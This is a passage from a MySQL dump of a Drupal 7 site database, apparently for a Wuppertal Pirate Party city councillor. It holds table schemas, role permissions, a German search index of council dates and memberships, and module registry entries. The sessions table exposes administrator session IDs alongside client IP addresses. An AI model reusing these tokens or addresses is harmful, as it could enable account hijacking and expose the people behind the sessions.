9c0a6e98486b66f3876bda0a8c165525'),('modules/search/search.extender.inc','c40f6569769ff581dbe11d29935c611320178f9a076977423e1d93e7d98013fa'),('modules/search/search.test','71ffda1d5c81823aa6f557ca35ba451df2f684856174e25e917f8bf4f0c72453'),('modules/shortcut/shortcut.test','0d78280d4d0a05aa772218e45911552e39611ca9c258b9dd436307914ac3f254'),('modules/statistics/statistics.test','3fc1617038ab69ce32a666def03cac5f80532d2e71bad811b4e8b0f75250736c'),('modules/system/system.archiver.inc','faa849f3e646a910ab82fd6c8bbf0a4e6b8c60725d7ba81ec0556bd716616cd1'),('modules/system/system.mail.inc','d31e1769f5defbe5f27dc68f641ab80fb8d3de92f6e895f4c654ec05fc7e5f0f'),('modules/system/system.queue.inc','ef00fd41ca86de386fa134d5bc1d816f9af550cf0e1334a5c0ade3119688ca3c'),('modules/system/system.tar.inc','8a31d91f7b3cd7eac25b3fa46e1ed9a8527c39718ba76c3f8c0bbbeaa3aa4086'),('modules/system/system.test','ad3c68f2cacfe6a99c065edc9aca05a22bdbc74ff6158e9918255b4633134ab4'),('modules/system/system.updater.inc','338cf14cb691ba16ee551b3b9e0fa4f579a2f25c964130658236726d17563b6a'),('modules/taxonomy/taxonomy.module','45d6d5652a464318f3eccf8bad6220cc5784e7ffdb0c7b732bf4d540e1effe83'),('modules/taxonomy/taxonomy.test','8525035816906e327ad48bd48bb071597f4c58368a692bcec401299a86699e6e'),('modules/update/update.test','1ea3e22bd4d47afb8b2799057cdbdfbb57ce09013d9d5f2de7e61ef9c2ebc72d'),('modules/user/user.module','b658c75c17b263a0aa6be903429c14e0fb1c308dd4e9024e369b7e7feb2b5dce'),('modules/user/user.test','d27160f1fd04cfb497ff080c7266fcebcd310d2224cfc6aef70035b275d65573'); /*!40000 ALTER TABLE `dpl_registry_file` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_role` -- DROP TABLE IF EXISTS `dpl_role`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_role` ( `rid` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary Key: Unique role ID.', `name` varchar(64) NOT NULL DEFAULT '' COMMENT 'Unique role name.', `weight` int(11) NOT NULL DEFAULT '0' COMMENT 'The weight of this role in listings and the user interface.', PRIMARY KEY (`rid`), UNIQUE KEY `name` (`name`), KEY `name_weight` (`name`,`weight`) ) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8 COMMENT='Stores user roles.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_role` -- LOCK TABLES `dpl_role` WRITE; /*!40000 ALTER TABLE `dpl_role` DISABLE KEYS */; INSERT INTO `dpl_role` VALUES (3,'administrator',2),(1,'anonymous user',0),(2,'authenticated user',1); /*!40000 ALTER TABLE `dpl_role` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_role_permission` -- DROP TABLE IF EXISTS `dpl_role_permission`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_role_permission` ( `rid` int(10) unsigned NOT NULL COMMENT 'Foreign Key: dpl_role.rid.', `permission` varchar(128) NOT NULL DEFAULT '' COMMENT 'A single permission granted to the role identified by rid.', `module` varchar(255) NOT NULL DEFAULT '' COMMENT 'The module declaring the permission.', PRIMARY KEY (`rid`,`permission`), KEY `permission` (`permission`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores the permissions assigned to user roles.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_role_permission` -- LOCK TABLES `dpl_role_permission` WRITE; /*!40000 ALTER TABLE `dpl_role_permission` DISABLE KEYS */; INSERT INTO `dpl_role_permission` VALUES (1,'access comments','comment'),(1,'access content','node'),(1,'use text format filtered_html','filter'),(2,'access comments','comment'),(2,'access content','node'),(2,'administer blocks','block'),(2,'post comments','comment'),(2,'skip comment approval','comment'),(2,'use text format filtered_html','filter'),(3,'access administration pages','system'),(3,'access comments','comment'),(3,'access content','node'),(3,'access content overview','node'),(3,'access contextual links','contextual'),(3,'access dashboard','dashboard'),(3,'access overlay','overlay'),(3,'access site in maintenance mode','system'),(3,'access site reports','system'),(3,'access site-wide contact form','contact'),(3,'access statistics','statistics'),(3,'access toolbar','toolbar'),(3,'access user contact forms','contact'),(3,'access user profiles','user'),(3,'administer actions','system'),(3,'administer blocks','block'),(3,'administer comments','comment'),(3,'administer contact forms','contact'),(3,'administer content types','node'),(3,'administer filters','filter'),(3,'administer image styles','image'),(3,'administer menu','menu'),(3,'administer modules','system'),(3,'administer nodes','node'),(3,'administer permissions','user'),(3,'administer search','search'),(3,'administer shortcuts','shortcut'),(3,'administer site configuration','system'),(3,'administer software updates','system'),(3,'administer statistics','statistics'),(3,'administer taxonomy','taxonomy'),(3,'administer themes','system'),(3,'administer url aliases','path'),(3,'administer users','user'),(3,'block IP addresses','system'),(3,'bypass node access','node'),(3,'cancel account','user'),(3,'change own username','user'),(3,'create article content','node'),(3,'create page content','node'),(3,'create url aliases','path'),(3,'customize shortcut links','shortcut'),(3,'delete any article content','node'),(3,'delete any page content','node'),(3,'delete own article content','node'),(3,'delete own page content','node'),(3,'delete revisions','node'),(3,'delete terms in 1','taxonomy'),(3,'edit any article content','node'),(3,'edit any page content','node'),(3,'edit own article content','node'),(3,'edit own comments','comment'),(3,'edit own page content','node'),(3,'edit terms in 1','taxonomy'),(3,'post comments','comment'),(3,'revert revisions','node'),(3,'search content','search'),(3,'select account cancellation method','user'),(3,'skip comment approval','comment'),(3,'switch shortcut sets','shortcut'),(3,'use advanced search','search'),(3,'use text format filtered_html','filter'),(3,'use text format full_html','filter'),(3,'view own unpublished content','node'),(3,'view post access counter','statistics'),(3,'view revisions','node'),(3,'view the administration theme','system'); /*!40000 ALTER TABLE `dpl_role_permission` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_search_dataset` -- DROP TABLE IF EXISTS `dpl_search_dataset`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_search_dataset` ( `sid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Search item ID, e.g. node ID for nodes.', `type` varchar(16) NOT NULL COMMENT 'Type of item, e.g. node.', `data` longtext NOT NULL COMMENT 'List of space-separated words from the item.', `reindex` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Set to force node reindexing.', PRIMARY KEY (`sid`,`type`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores items that will be searched.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_search_dataset` -- LOCK TABLES `dpl_search_dataset` WRITE; /*!40000 ALTER TABLE `dpl_search_dataset` DISABLE KEYS */; INSERT INTO `dpl_search_dataset` VALUES (2,'node',' stadtverordneter olli graf olli graf stadtverordneter im rat der stadt wuppertal mitglied der piratenpartei mitglied in der fraktion bündnis 90 die grünen ',0),(5,'node',' termine 21112014 tag der offenen tür aidshilfe wuppertal 23112014 kreismitgliederversammlung 26112014 ausschuss stadtentwicklung wirtschaft und bauen 26112014 bürgerbegehren gegen den verkauf des carnaper platzes 1122014 filmpremiere dokumentation stigma adhs zum thema adhs bei kindern 3122014 bv elberfeld 9122014 bv barmen 15122014 ratssitzung 19122014 offiz eröffnung der nordbahntrasse januar 18012015 neujahrsempfang bürgerverein langerfeld und förderverein der gesamtschule langerfeld 2801 2015 bv elberfeld februar 9022015 gemeinsame sondersitzung der ausschüsse finanzen stawibau und beteiligungssteuerung 10022015 ratssondersitzung 11022015 wuppertal 30 24022015 bv barmen 25022015 bv elberfeld märz 3032015 wuppertal 30 9032015 ratssitzung 24032015 nahverkehr neu denken das solidarische bürgerticket 25032015 wuppertal 30 april 14042015 wuppertal 30 22042015 ausschuss stadtentwicklung wirtschaft und bauen 28042014 bv barmen 29042015 bv elberfeld mai 6052015 wuppertal 30 11052015 ratssitzung 21052015 wuppertal 30 30052015 wuppertal 30 juni 3062015 ausschuss stadtentwicklung wirtschaft und bauen 9062015 bv barmen 10062015 bv elberfeld 22062015 ratssitzung 29062015 beginn der sommerferien juli 2526072015 bpt 20151 würzburg august 25082015 bv barmen 27082015 ausschuss stadtentwicklung wirtschaft und bauen september 7092015 ratssitzung jeden 2 und 4 donnerstag eines monats stammtisch im abgeordnetenbüro wichlinghauser str 61 ',0),(6,'node',' mitgliedschaften ich bin mitglied in folgenden organisationen asv allgemeiner sportverein wuppertal ev adac allgemeiner deutscher automobilclub ev musikpiraten ev nag neue assekuranz gerwerkschaft piratenpartei nrw piko nrw ev ',0); /*!40000 ALTER TABLE `dpl_search_dataset` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_search_index` -- DROP TABLE IF EXISTS `dpl_search_index`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_search_index` ( `word` varchar(50) NOT NULL DEFAULT '' COMMENT 'The dpl_search_total.word that is associated with the search item.', `sid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The dpl_search_dataset.sid of the searchable item to which the word belongs.', `type` varchar(16) NOT NULL COMMENT 'The dpl_search_dataset.type of the searchable item to which the word belongs.', `score` float DEFAULT NULL COMMENT 'The numeric score of the word, higher being more important.', PRIMARY KEY (`word`,`sid`,`type`), KEY `sid_type` (`sid`,`type`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores the search index, associating words, items and...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_search_index` -- LOCK TABLES `dpl_search_index` WRITE; /*!40000 ALTER TABLE `dpl_search_index` DISABLE KEYS */; INSERT INTO `dpl_search_index` VALUES ('10022015',5,'node',1),('10062015',5,'node',1),('11022015',5,'node',1),('11052015',5,'node',1),('1122014',5,'node',1),('14042015',5,'node',1),('15122014',5,'node',1),('18012015',5,'node',1),('19122014',5,'node',1),('2',5,'node',0.989021),('2015',5,'node',1),('20151',5,'node',1),('21052015',5,'node',1),('21112014',5,'node',1),('22042015',5,'node',1),('22062015',5,'node',1),('23112014',5,'node',1),('24022015',5,'node',1),('24032015',5,'node',1),('25022015',5,'node',1),('25032015',5,'node',1),('25082015',5,'node',1),('2526072015',5,'node',1),('26112014',5,'node',2),('27082015',5,'node',1),('2801',5,'node',1),('28042014',5,'node',1),('29042015',5,'node',1),('29062015',5,'node',1),('30',5,'node',7),('30052015',5,'node',1),('3032015',5,'node',1),('3062015',5,'node',1),('3122014',5,'node',1),('4',5,'node',0.98493),('6052015',5,'node',1),('61',5,'node',0.953396),('7092015',5,'node',0.997306),('90',2,'node',1),('9022015',5,'node',1),('9032015',5,'node',1),('9062015',5,'node',1),('9122014',5,'node',1),('abgeordnetenbüro',5,'node',0.96498),('adac',6,'node',1),('adhs',5,'node',2),('aidshilfe',5,'node',1),('allgemeiner',6,'node',2),('april',5,'node',4),('assekuranz',6,'node',1),('asv',6,'node',1),('august',5,'node',4),('ausschuss',5,'node',4),('ausschüsse',5,'node',1),('automobilclub',6,'node',1),('barmen',5,'node',5),('bauen',5,'node',4),('beginn',5,'node',1),('bei',5,'node',1),('beteiligungssteuerung',5,'node',1),('bin',6,'node',1),('bpt',5,'node',1),('bündnis',2,'node',1),('bürgerbegehren',5,'node',1),('bürgerticket',5,'node',1),('bürgerverein',5,'node',1),('carnaper',5,'node',1),('das',5,'node',1),('den',5,'node',1),('denken',5,'node',1),('der',2,'node',3),('der',5,'node',5),('des',5,'node',1),('deutscher',6,'node',1),('die',2,'node',1),('dokumentation',5,'node',1),('donnerstag',5,'node',0.980874),('eines',5,'node',0.976851),('elberfeld',5,'node',5),('eröffnung',5,'node',1),('februar',5,'node',4),('filmpremiere',5,'node',1),('finanzen',5,'node',1),('folgenden',6,'node',1),('förderverein',5,'node',1),('fraktion',2,'node',1),('gegen',5,'node',1),('gemeinsame',5,'node',1),('gerwerkschaft',6,'node',1),('gesamtschule',5,'node',1),('graf',2,'node',27),('grünen',2,'node',1),('ich',6,'node',1),('januar',5,'node',4),('jeden',5,'node',0.993146),('juli',5,'node',4),('juni',5,'node',4),('kindern',5,'node',1),('kreismitgliederversammlung',5,'node',1),('langerfeld',5,'node',2),('mai',5,'node',4),('märz',5,'node',4),('mitglied',2,'node',2),('mitglied',6,'node',1),('mitgliedschaften',6,'node',26),('monats',5,'node',0.972861),('musikpiraten',6,'node',1),('nag',6,'node',1),('nahverkehr',5,'node',1),('neu',5,'node',1),('neue',6,'node',1),('neujahrsempfang',5,'node',1),('nordbahntrasse',5,'node',1),('nrw',6,'node',2),('offenen',5,'node',1),('offiz',5,'node',1),('olli',2,'node',27),('organisationen',6,'node',1),('piko',6,'node',1),('piratenpartei',2,'node',1),('piratenpartei',6,'node',1),('platzes',5,'node',1),('rat',2,'node',1),('ratssitzung',5,'node',4.99315),('ratssondersitzung',5,'node',1),('september',5,'node',4),('solidarische',5,'node',1),('sommerferien',5,'node',1),('sondersitzung',5,'node',1),('sportverein',6,'node',1),('stadt',2,'node',1),('stadtentwicklung',5,'node',4),('stadtverordneter',2,'node',27),('stammtisch',5,'node',0.968904),('stawibau',5,'node',1),('stigma',5,'node',1),('str',5,'node',0.957226),('tag',5,'node',1),('termine',5,'node',26),('thema',5,'node',1),('tür',5,'node',1),('und',5,'node',6.98493),('verkauf',5,'node',1),('wichlinghauser',5,'node',0.961087),('wirtschaft',5,'node',4),('wuppertal',2,'node',1),('wuppertal',5,'node',8),('wuppertal',6,'node',1),('würzburg',5,'node',1),('zum',5,'node',1); /*!40000 ALTER TABLE `dpl_search_index` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_search_node_links` -- DROP TABLE IF EXISTS `dpl_search_node_links`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_search_node_links` ( `sid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The dpl_search_dataset.sid of the searchable item containing the link to the node.', `type` varchar(16) NOT NULL DEFAULT '' COMMENT 'The dpl_search_dataset.type of the searchable item containing the link to the node.', `nid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The dpl_node.nid that this item links to.', `caption` longtext COMMENT 'The text used to link to the dpl_node.nid.', PRIMARY KEY (`sid`,`type`,`nid`), KEY `nid` (`nid`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores items (like nodes) that link to other nodes, used...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_search_node_links` -- LOCK TABLES `dpl_search_node_links` WRITE; /*!40000 ALTER TABLE `dpl_search_node_links` DISABLE KEYS */; /*!40000 ALTER TABLE `dpl_search_node_links` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_search_total` -- DROP TABLE IF EXISTS `dpl_search_total`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_search_total` ( `word` varchar(50) NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique word in the search index.', `count` float DEFAULT NULL COMMENT 'The count of the word in the index using Zipf’s law to equalize the probability distribution.', PRIMARY KEY (`word`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores search totals for words.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_search_total` -- LOCK TABLES `dpl_search_total` WRITE; /*!40000 ALTER TABLE `dpl_search_total` DISABLE KEYS */; INSERT INTO `dpl_search_total` VALUES ('10022015',0.30103),('10062015',0.30103),('11022015',0.30103),('11052015',0.30103),('1122014',0.30103),('14042015',0.30103),('15122014',0.30103),('18012015',0.30103),('19122014',0.30103),('2',0.30103),('2015',0.30103),('20151',0.30103),('21052015',0.30103),('21112014',0.30103),('22042015',0.30103),('22062015',0.30103),('23112014',0.30103),('24022015',0.30103),('24032015',0.30103),('25022015',0.30103),('25032015',0.30103),('25082015',0.30103),('2526072015',0.30103),('26112014',0.176091),('27082015',0.30103),('2801',0.30103),('28042014',0.30103),('29042015',0.30103),('29062015',0.30103),('30',0.0579919),('30052015',0.30103),('3032015',0.30103),('3062015',0.30103),('3122014',0.30103),('4',0.30103),('6052015',0.30103),('61',0.30103),('7092015',0.30103),('90',0.30103),('9022015',0.30103),('9032015',0.30103),('9062015',0.30103),('9122014',0.30103),('abgeordnetenbüro',0.30103),('adac',0.30103),('adhs',0.176091),('aidshilfe',0.30103),('allgemeiner',0.176091),('april',0.09691),('assekuranz',0.30103),('asv',0.30103),('august',0.09691),('ausschuss',0.09691),('ausschüsse',0.30103),('automobilclub',0.30103),('barmen',0.0791812),('bauen',0.09691),('beginn',0.30103),('bei',0.30103),('beteiligungssteuerung',0.30103),('bin',0.30103),('bpt',0.30103),('bündnis',0.30103),('bürgerbegehren',0.30103),('bürgerticket',0.30103),('bürgerverein',0.30103),('carnaper',0.30103),('das',0.30103),('den',0.30103),('denken',0.30103),('der',0.0511525),('des',0.30103),('deutscher',0.30103),('die',0.30103),('dokumentation',0.30103),('donnerstag',0.30103),('eines',0.30103),('elberfeld',0.0791812),('eröffnung',0.30103),('februar',0.09691),('filmpremiere',0.30103),('finanzen',0.30103),('folgenden',0.30103),('förderverein',0.30103),('fraktion',0.30103),('gegen',0.30103),('gemeinsame',0.30103),('gerwerkschaft',0.30103),('gesamtschule',0.30103),('graf',0.0157943),('grünen',0.30103),('ich',0.30103),('januar',0.09691),('jeden',0.30103),('juli',0.09691),('juni',0.09691),('kindern',0.30103),('kreismitgliederversammlung',0.30103),('langerfeld',0.176091),('mai',0.09691),('märz',0.09691),('mitglied',0.124939),('mitgliedschaften',0.0163904),('monats',0.30103),('musikpiraten',0.30103),('nag',0.30103),('nahverkehr',0.30103),('neu',0.30103),('neue',0.30103),('neujahrsempfang',0.30103),('nordbahntrasse',0.30103),('nrw',0.176091),('offenen',0.30103),('offiz',0.30103),('olli',0.0157943),('organisationen',0.30103),('piko',0.30103),('piratenpartei',0.176091),('platzes',0.30103),('rat',0.30103),('ratssitzung',0.0792806),('ratssondersitzung',0.30103),('september',0.09691),('solidarische',0.30103),('sommerferien',0.30103),('sondersitzung',0.30103),('sportverein',0.30103),('stadt',0.30103),('stadtentwicklung',0.09691),('stadtverordneter',0.0157943),('stammtisch',0.30103),('stawibau',0.30103),('stigma',0.30103),('str',0.30103),('tag',0.30103),('termine',0.0163904),('thema',0.30103),('tür',0.30103),('und',0.0581091),('verkauf',0.30103),('wichlinghauser',0.30103),('wirtschaft',0.09691),('wuppertal',0.0413927),('würzburg',0.30103),('zum',0.30103); /*!40000 ALTER TABLE `dpl_search_total` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_semaphore` -- DROP TABLE IF EXISTS `dpl_semaphore`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_semaphore` ( `name` varchar(255) NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique name.', `value` varchar(255) NOT NULL DEFAULT '' COMMENT 'A value for the semaphore.', `expire` double NOT NULL COMMENT 'A Unix timestamp with microseconds indicating when the semaphore should expire.', PRIMARY KEY (`name`), KEY `value` (`value`), KEY `expire` (`expire`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Table for holding semaphores, locks, flags, etc. that...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_semaphore` -- LOCK TABLES `dpl_semaphore` WRITE; /*!40000 ALTER TABLE `dpl_semaphore` DISABLE KEYS */; /*!40000 ALTER TABLE `dpl_semaphore` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_sequences` -- DROP TABLE IF EXISTS `dpl_sequences`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_sequences` ( `value` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'The value of the sequence.', PRIMARY KEY (`value`) ) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=utf8 COMMENT='Stores IDs.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_sequences` -- LOCK TABLES `dpl_sequences` WRITE; /*!40000 ALTER TABLE `dpl_sequences` DISABLE KEYS */; INSERT INTO `dpl_sequences` VALUES (6); /*!40000 ALTER TABLE `dpl_sequences` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_sessions` -- DROP TABLE IF EXISTS `dpl_sessions`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_sessions` ( `uid` int(10) unsigned NOT NULL COMMENT 'The dpl_users.uid corresponding to a session, or 0 for anonymous user.', `sid` varchar(128) NOT NULL COMMENT 'A session ID. The value is generated by Drupal’s session handlers.', `ssid` varchar(128) NOT NULL DEFAULT '' COMMENT 'Secure session ID. The value is generated by Drupal’s session handlers.', `hostname` varchar(128) NOT NULL DEFAULT '' COMMENT 'The IP address that last used this session ID (sid).', `timestamp` int(11) NOT NULL DEFAULT '0' COMMENT 'The Unix timestamp when this session last requested a page. Old records are purged by PHP automatically.', `cache` int(11) NOT NULL DEFAULT '0' COMMENT 'The time of this user’s last post. This is used when the site has specified a minimum_cache_lifetime. See cache_get().', `session` longblob COMMENT 'The serialized contents of $_SESSION, an array of name/value pairs that persists across page requests by this session ID. Drupal loads $_SESSION from here at the start of each request and saves it at the end.', PRIMARY KEY (`sid`,`ssid`), KEY `timestamp` (`timestamp`), KEY `uid` (`uid`), KEY `ssid` (`ssid`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Drupal’s session handlers read and write into the...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_sessions` -- LOCK TABLES `dpl_sessions` WRITE; /*!40000 ALTER TABLE `dpl_sessions` DISABLE KEYS */; INSERT INTO `dpl_sessions` VALUES (1,'8CYZ97cxy8UPW0ZjodBzqUhGqmYZAREThA_NLD4u0wE','','95.223.216.9',1426848121,0,''),(1,'9tFRb714OTYvJcdVO6qKe9L6l_ewgofi46ZiUYRTWw4','','195.128.43.120',1426503707,0,''),(1,'agrVAADx3YZlNfSpCfCmKbj96fPA9pa1xOkjqoyhyOc','','195.128.43.120',1425562112,0,''),(1,'g8KBVNNmcb2Zw8eWfUM4QP172QXcoOHrUzXln0oDoaE','','93.202.100.43',1426187885,0,''); /*!40000 ALTER TABLE `dpl_sessions` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_shortcut_set` -- DROP TABLE IF EXISTS `dpl_shortcut_set`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_shortcut_set` ( `set_name` varchar(32) NOT NULL DEFAULT '' COMMENT 'Primary Key: The dpl_menu_links.menu_name under which the set’s links are stored.', `title` varchar(255) NOT NULL DEFAULT '' COMMENT 'The title of the set.', PRIMARY KEY (`set_name`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores information about sets of shortcuts links.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_shortcut_set` -- LOCK TABLES `dpl_shortcut_set` WRITE; /*!40000 ALTER TABLE `dpl_shortcut_set` DISABLE KEYS */; INSERT INTO `dpl_shortcut_set` VALUES ('shortcut-set-1','Default'); /*!40000 ALTER TABLE `dpl_shortcut_set` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_shortcut_set_users` -- DROP TABLE IF EXISTS `dpl_shortcut_set_users`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_shortcut_set_users` ( `uid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The dpl_users.uid for this set.', `set_name` varchar(32) NOT NULL DEFAULT '' COMMENT 'The dpl_shortcut_set.set_name that will be displayed for this user.', PRIMARY KEY (`uid`), KEY `set_name` (`set_name`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Maps users to shortcut sets.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_shortcut_set_users` -- LOCK TABLES `dpl_shortcut_set_users` WRITE; /*!40000 ALTER TABLE `dpl_shortcut_set_users` DISABLE KEYS */; /*!40000 ALTER TABLE `dpl_shortcut_set_users` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_system` -- DROP TABLE IF EXISTS `dpl_system`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_system` ( `filename` varchar(255) NOT NULL DEFAULT '' COMMENT 'The path of the primary file for this item, relative to the Drupal root; e.g. modules/node/node.module.', `name` varchar(255) NOT NULL DEFAULT '' COMMENT 'The name of the item; e.g. node.', `type` varchar(12) NOT NULL DEFAULT '' COMMENT 'The type of the item, either module, theme, or theme_engine.', `owner` varchar(255) NOT NULL DEFAULT '' COMMENT 'A theme’s ’parent’ . Can be either a theme or an engine.', `status` int(11) NOT NULL DEFAULT '0' COMMENT 'Boolean indicating whether or not this item is enabled.', `bootstrap` int(11) NOT NULL DEFAULT '0' COMMENT 'Boolean indicating whether this module is loaded during Drupal’s early bootstrapping phase (e.g. even before the page cache is consulted).', `schema_version` smallint(6) NOT NULL DEFAULT '-1' COMMENT 'The module’s database schema version number. -1 if the module is not installed (its tables do not exist); 0 or the largest N of the module’s hook_update_N() function that has either been run or existed when the module was first installed.', `weight` int(11) NOT NULL DEFAULT '0' COMMENT 'The order in which this module’s hooks should be invoked relative to other modules. Equal-weighted modules are ordered by name.', `info` blob COMMENT 'A serialized array containing information from the module’s .info file; keys can include name, description, package, version, core, dependencies, and php.', PRIMARY KEY (`filename`), KEY `system_list` (`status`,`bootstrap`,`type`,`weight`,`name`), KEY `type_name` (`type`,`name`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='A list of all modules, themes, and theme engines that are...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_system` -- LOCK TABLES `dpl_system` WRITE; /*!40000 ALTER TABLE `dpl_system` DISABLE KEYS */; INSERT INTO `dpl_system` VALUES ('modules/aggregator/aggregator.module','aggregator','module','',0,0,-1,0,'a:14:{s:4:\"name\";s:10:\"Aggregator\";s:11:\"description\";s:57:\"Aggregates syndicated content (RSS, RDF, and Atom feeds).\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:15:\"aggregator.test\";}s:9:\"configure\";s:41:\"admin/config/services/aggregator/settings\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:14:\"aggregator.css\";s:33:\"modules/aggregator/aggregator.css\";}}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/aggregator/tests/aggregator_test.module','aggregator_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:23:\"Aggregator module tests\";s:11:\"description\";s:46:\"Support module for aggregator related testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/block/block.module','block','module','',1,0,7009,-5,'a:13:{s:4:\"name\";s:5:\"Block\";s:11:\"description\";s:140:\"Controls the visual building blocks a page is constructed with. Blocks are boxes of content rendered into an area, or region, of a web page.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:10:\"block.test\";}s:9:\"configure\";s:21:\"admin/structure/block\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/block/tests/block_test.module','block_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:10:\"Block test\";s:11:\"description\";s:21:\"Provides test blocks.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/blog/blog.module','blog','module','',0,0,-1,0,'a:12:{s:4:\"name\";s:4:\"Blog\";s:11:\"description\";s:25:\"Enables multi-user 